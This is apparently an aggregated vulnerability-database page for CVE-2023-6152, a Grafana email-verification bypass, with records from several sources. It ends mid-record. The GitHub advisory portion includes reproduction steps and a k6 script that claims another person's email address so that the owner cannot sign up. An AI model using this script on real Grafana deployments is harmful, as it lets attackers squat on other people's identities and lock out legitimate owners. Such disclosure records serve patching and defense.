"\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "7.3 (\u0420\u0415\u0414 \u041e\u0421), \u0434\u043e 9.5.16 (Grafana), \u043e\u0442 10.0.0 \u0434\u043e 10.0.11 (Grafana), \u043e\u0442 10.1.0 \u0434\u043e 10.1.7 (Grafana), \u043e\u0442 10.2.0 \u0434\u043e 10.2.4 (Grafana), \u043e\u0442 10.3.0 \u0434\u043e 10.3.3 (Grafana)",
"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\n\u0414\u043b\u044f Grafana:\nhttps://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/\n\n\u0414\u043b\u044f \u0420\u0435\u0434\u041e\u0421: http://repo.red-soft.ru/redos/7.3c/x86_64/updates/",
"\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "10.11.2023",
"\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "22.04.2024",
"\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "10.04.2024",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2024-02816",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2023-6152",
"\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
"\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
"\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "\u0420\u0415\u0414 \u041e\u0421 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751), Grafana",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u041e\u0421 \u0438 \u0442\u0438\u043f \u0430\u043f\u043f\u0430\u0440\u0430\u0442\u043d\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b": "\u041e\u041e\u041e \u00ab\u0420\u0435\u0434 \u0421\u043e\u0444\u0442\u00bb \u0420\u0415\u0414 \u041e\u0421 7.3 (\u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u0435\u0434\u0438\u043d\u043e\u043c \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u21163751)",
"\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432\u0435\u0431-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 Grafana, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0438 \u043f\u043e\u043c\u0435\u0448\u0430\u0442\u044c \u0437\u0430\u043a\u043e\u043d\u043d\u044b\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0430\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f",
"\u041d\u0430\u043b\u0438\u0447\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430": "\u0421\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "\u041d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0430\u044f \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f (CWE-863)",
"\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u0430\u0437\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432\u0435\u0431-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 Grafana \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 verify_email_enabled. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e, \u043e\u0431\u043e\u0439\u0442\u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0438 \u043f\u043e\u043c\u0435\u0448\u0430\u0442\u044c \u0437\u0430\u043a\u043e\u043d\u043d\u044b\u043c \u0432\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0430\u043c \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f",
"\u041f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": null,
"\u041f\u0440\u043e\u0447\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f": null,
"\u0421\u0432\u044f\u0437\u044c \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438 \u0418\u0411": "\u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0442\u043e\u0447\u043d\u044f\u044e\u0442\u0441\u044f",
"\u0421\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f": "\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0421\u043f\u043e\u0441\u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438": "\u041d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438",
"\u0421\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438": "https://grafana.com/blog/2024/02/14/grafana-security-release-medium-severity-security-fix-for-cve-2023-6152/\nhttps://grafana.com/security/security-advisories/cve-2023-6152/\nhttps://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f\nhttp://repo.red-soft.ru/redos/7.3c/x86_64/updates/",
"\u0421\u0442\u0430\u0442\u0443\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u041f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u043c",
"\u0422\u0438\u043f \u041f\u041e": "\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430, \u041f\u0440\u0438\u043a\u043b\u0430\u0434\u043d\u043e\u0435 \u041f\u041e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c",
"\u0422\u0438\u043f \u043e\u0448\u0438\u0431\u043a\u0438 CWE": "CWE-863",
"\u0423\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 2.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 5,5)\n\u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (\u0431\u0430\u0437\u043e\u0432\u0430\u044f \u043e\u0446\u0435\u043d\u043a\u0430 CVSS 3.0 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 5,4)"
}
bit-grafana-2023-6152
Vulnerability from bitnami_vulndb
Published
2024-03-12 08:24
Modified
2025-04-03 14:40
Summary
Details
A user changing their email after signing up and verifying it can change it without verification in profile settings.
The configuration option "verify_email_enabled" will only validate email only on sign up.
{
"affected": [
{
"package": {
"ecosystem": "Bitnami",
"name": "grafana",
"purl": "pkg:bitnami/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "2.5.0"
},
{
"fixed": "9.5.16"
},
{
"introduced": "10.0.0"
},
{
"fixed": "10.0.11"
},
{
"introduced": "10.1.0"
},
{
"fixed": "10.1.7"
},
{
"introduced": "10.2.0"
},
{
"fixed": "10.2.4"
},
{
"introduced": "10.3.0"
},
{
"fixed": "10.3.3"
}
],
"type": "SEMVER"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
],
"aliases": [
"CVE-2023-6152"
],
"database_specific": {
"cpes": [
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*",
"cpe:2.3:a:grafana:grafana:*:*:*:*:*:go:*:*"
],
"severity": "Medium"
},
"details": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.",
"id": "BIT-grafana-2023-6152",
"modified": "2025-04-03T14:40:37.652Z",
"published": "2024-03-12T08:24:38.577Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250214-0008/"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6152"
}
],
"schema_version": "1.5.0"
}
FKIE_CVE-2023-6152
Vulnerability from fkie_nvd - Published: 2024-02-13 22:15 - Updated: 2025-02-15 01:15
Severity ?
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Summary
A user changing their email after signing up and verifying it can change it without verification in profile settings.
The configuration option "verify_email_enabled" will only validate email only on sign up.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F1B0912A-B5CC-42BE-93D4-0A501A0245FA",
"versionEndIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:10.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CB81DBAE-551A-41FD-BFB5-325C9E0BCA10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:10.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1A61A884-885C-4961-8263-682CC9EDBCE8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:10.2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "EE8E4C18-557B-4CD0-9EE5-DC4B8D5F20BC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:grafana:grafana:10.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "9F6206EA-DB68-4409-A694-74F47D6879D4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n"
},
{
"lang": "es",
"value": "Un usuario que cambia su correo electr\u00f3nico despu\u00e9s de registrarse y verificarlo puede cambiarlo sin verificaci\u00f3n en la configuraci\u00f3n del perfil. La opci\u00f3n de configuraci\u00f3n \"verify_email_enabled\" solo validar\u00e1 el correo electr\u00f3nico al registrarse."
}
],
"id": "CVE-2023-6152",
"lastModified": "2025-02-15T01:15:09.723",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "security@grafana.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.5,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-02-13T22:15:45.430",
"references": [
{
"source": "security@grafana.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"source": "security@grafana.com",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://security.netapp.com/advisory/ntap-20250214-0008/"
}
],
"sourceIdentifier": "security@grafana.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "security@grafana.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-863"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-3HV4-R2FM-H27F
Vulnerability from github – Published: 2024-02-13 22:25 – Updated: 2025-02-18 22:29
VLAI?
Summary
Email Validation Bypass And Preventing Sign Up From Email's Owner
Details
Summary
Email validation can easily be bypassed because verify_email_enabled option enable email validation at sign up only.
A user changing it's email after signing up (and verifying it) can change it without verification in /profile.
This can be used to prevent legitimate owner of the email address from signing up.
Another way to prevent email's owner from signing up is by setting Username as an email: When a new user is registrering, they can set two different email addresses in the Email and Username field, technically having 2 email addresses (because Grafana handles usernames and emails the same in some situations), but only the former is validated.
Here user a prevents owner of bar@example.com to signup.
Details
I don't know exact location but this is related to PUT /api/user handler.
PoC
Bypass email validation: * Start a new grafana instance using latest version * Sign up with email foo@example. * Login to that account. * Go to profile and change email to bar@example.com * That's it, your using an email you don't own.
Prevent email's owner from signing up: * Start a new grafana instance using latest version * Sign up with email foo@example. * Login to that account. * Go to profile and change username (not email) to bar@example.com * Signout. * Try to sign up with email b@example.com * Warning popup "User with same email address already exists"
K6 script (with verify_email_enabled set to false):
import { check, group } from "k6"
import http from "k6/http"
export const options = {
scenarios: {
perVuIter: {
executor: 'per-vu-iterations',
vus: 1,
iterations: 1
}
}
}
const GRAFANA_URL = __ENV.GRAFANA_URL || "http://localhost:3000"
export default function () {
group("create user_a with email foo@example.com", () => {
const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({
"email": "foo@example.com",
"password": "password"
}), {
headers: {
'Content-Type': "application/json"
}
})
check(response, {
'status code is 200': (r) => r.status == 200
})
})
group("change user_a login to bar@example.com", () => {
const response = http.put(`${GRAFANA_URL}/api/user`, JSON.stringify({
"email": "foo@example.com",
"login": "bar@example.com", // user_b email.
}), {
headers: {
'Content-Type': "application/json"
}
})
check(response, {
'status code is 200': (r) => r.status == 200
})
})
http.cookieJar().clear(GRAFANA_URL)
group("create user_b with email bar@example.com", () => {
const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({
"email": "bar@example.com",
"username": "bar@example.com",
"password": "password"
}), {
headers: {
'Content-Type': "application/json"
}
})
check(response, {
'status code is 200': (r) => r.status == 200 // fail
})
})
}
Impact
Bypass email verification. Prevent legitimate owner from signing up.
Severity ?
5.4 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "2.5.0"
},
{
"fixed": "9.5.16"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.0.11"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.1.0"
},
{
"fixed": "10.1.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.2.0"
},
{
"fixed": "10.2.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/grafana/grafana"
},
"ranges": [
{
"events": [
{
"introduced": "10.3.0"
},
{
"fixed": "10.3.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-6152"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2024-02-13T22:25:10Z",
"nvd_published_at": "2024-02-13T22:15:45Z",
"severity": "MODERATE"
},
"details": "### Summary\nEmail validation can easily be bypassed because `verify_email_enabled` option enable email validation at sign up only.\nA user changing it\u0027s email after signing up (and verifying it) can change it without verification in `/profile`.\nThis can be used to prevent legitimate owner of the email address from signing up.\n\nAnother way to prevent email\u0027s owner from signing up is by setting Username as an email:\nWhen a new user is registrering, they can set two different email addresses in the Email and Username field, technically having 2 email addresses (because Grafana handles usernames and emails the same in some situations), but only the former is validated.\n\n\n\nHere user a prevents owner of bar@example.com to signup.\n\n### Details\nI don\u0027t know exact location but this is related to PUT /api/user handler.\n\n### PoC\nBypass email validation:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change email to bar@example.com\n* That\u0027s it, your using an email you don\u0027t own.\n\nPrevent email\u0027s owner from signing up:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change username (not email) to [bar@example.com](mailto:bar@example.com)\n* Signout.\n* Try to sign up with email [b@example.com](mailto:b@example.com)\n* Warning popup \"User with same email address already exists\"\n\nK6 script (with `verify_email_enabled` set to `false`):\n```js\nimport { check, group } from \"k6\"\nimport http from \"k6/http\"\n\nexport const options = {\n scenarios: {\n perVuIter: {\n executor: \u0027per-vu-iterations\u0027,\n vus: 1,\n iterations: 1\n }\n }\n}\n\nconst GRAFANA_URL = __ENV.GRAFANA_URL || \"http://localhost:3000\"\n\nexport default function () {\n group(\"create user_a with email foo@example.com\", () =\u003e {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"foo@example.com\",\n \"password\": \"password\"\n }), {\n headers: {\n \u0027Content-Type\u0027: \"application/json\"\n }\n })\n\n check(response, {\n \u0027status code is 200\u0027: (r) =\u003e r.status == 200\n })\n })\n\n group(\"change user_a login to bar@example.com\", () =\u003e {\n const response = http.put(`${GRAFANA_URL}/api/user`, JSON.stringify({\n \"email\": \"foo@example.com\",\n \"login\": \"bar@example.com\", // user_b email.\n }), {\n headers: {\n \u0027Content-Type\u0027: \"application/json\"\n }\n })\n\n check(response, {\n \u0027status code is 200\u0027: (r) =\u003e r.status == 200\n })\n })\n\n http.cookieJar().clear(GRAFANA_URL)\n\n group(\"create user_b with email bar@example.com\", () =\u003e {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"bar@example.com\",\n \"username\": \"bar@example.com\",\n \"password\": \"password\"\n }), {\n headers: {\n \u0027Content-Type\u0027: \"application/json\"\n }\n })\n\n check(response, {\n \u0027status code is 200\u0027: (r) =\u003e r.status == 200 // fail\n })\n })\n}\n```\n\n### Impact\nBypass email verification.\nPrevent legitimate owner from signing up.",
"id": "GHSA-3hv4-r2fm-h27f",
"modified": "2025-02-18T22:29:35Z",
"published": "2024-02-13T22:25:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6152"
},
{
"type": "PACKAGE",
"url": "https://github.com/grafana/grafana"
},
{
"type": "WEB",
"url": "https://grafana.com/security/security-advisories/cve-2023-6152"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250214-0008"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Email Validation Bypass And Preventing Sign Up From Email\u0027s Owner"
}
GSD-2023-6152
Vulnerability from gsd - Updated: 2023-12-13 01:20Details
A user changing their email after signing up and verifying it can change it without verification in profile settings.
The configuration option "verify_email_enabled" will only validate email only on sign up.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2023-6152",
"id": "GSD-2023-6152"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2023-6152"
],
"details": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n",
"id": "GSD-2023-6152",
"modified": "2023-12-13T01:20:32.774255Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security@grafana.com",
"ID": "CVE-2023-6152",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Grafana",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "2.5.0",
"version_value": "9.5.16"
},
{
"version_affected": "\u003c",
"version_name": "10.0.0",
"version_value": "10.0.11"
},
{
"version_affected": "\u003c",
"version_name": "10.1.0",
"version_value": "10.1.7"
},
{
"version_affected": "\u003c",
"version_name": "10.2.0",
"version_value": "10.2.4"
},
{
"version_affected": "\u003c",
"version_name": "10.3.0",
"version_value": "10.3.3"
}
]
}
},
{
"product_name": "Grafana Enterprise",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_name": "2.5.0",
"version_value": "9.5.16"
},
{
"version_affected": "\u003c",
"version_name": "10.0.0",
"version_value": "10.0.11"
},
{
"version_affected": "\u003c",
"version_name": "10.1.0",
"version_value": "10.1.7"
},
{
"version_affected": "\u003c",
"version_name": "10.2.0",
"version_value": "10.2.4"
},
{
"version_affected": "\u003c",
"version_name": "10.3.0",
"version_value": "10.3.3"
}
]
}
}
]
},
"vendor_name": "Grafana"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A user changing their email after signing up and verifying it can change it without verification in profile settings.\n\nThe configuration option \"verify_email_enabled\" will only validate email only on sign up.\n\n"
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-863",
"lang": "eng",
"value": "CWE-863"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://grafana.com/security/security-advisories/cve-2023-6152/",
"refsource": "MISC",
"url": "https://grafana.com/security/security-advisories/cve-2023-6152/"
},
{
"name": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f",
"refsource": "MISC",
